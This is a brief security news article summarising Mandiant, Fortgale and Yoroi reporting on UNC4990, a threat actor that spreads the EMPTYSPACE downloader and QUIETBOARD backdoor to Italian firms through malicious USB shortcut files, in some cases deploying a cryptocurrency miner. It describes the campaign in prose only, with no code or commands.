Italian Businesses Hit by Weaponized USBs Spreading Cryptojacking Malware

31.01.2024

A financially motivated threat actor identified as UNC4990 is employing weaponized USB devices as an initial means of infecting organizations in Italy, according to a report from Mandiant, a subsidiary of Google. The targeted sectors encompass health, transportation, construction, and logistics.

Mandiant’s report, released on Tuesday, outlines the typical UNC4990 modus operandi, which involves widespread USB infections followed by the deployment of the EMPTYSPACE downloader. Throughout these operations, UNC4990 relies on third-party websites such as GitHub, Vimeo, and Ars Technica to host encoded additional stages. These stages are downloaded and decoded via PowerShell early in the execution chain.

Active since late 2020, UNC4990 is believed to operate out of Italy, evident from its extensive use of Italian infrastructure for command-and-control (C2) purposes. The ultimate goal of UNC4990 remains unclear, although there is a documented instance where an open-source cryptocurrency miner was deployed after months of beaconing activity.

Fortgale and Yoroi previously documented details of the campaign in early December 2023, with Fortgale referring to the threat actor as Nebula Broker. The infection initiates when a victim double-clicks on a malicious LNK shortcut file on a removable USB device, triggering the execution of a PowerShell script responsible for downloading EMPTYSPACE (also known as BrokerLoader or Vetta Loader) from a remote server via an intermediate PowerShell script hosted on Vimeo.

Yoroi has identified four different variants of EMPTYSPACE written in Golang, .NET, Node.js, and Python. These variants act as conduits for fetching next-stage payloads over HTTP from the C2 server, including a backdoor named QUIETBOARD.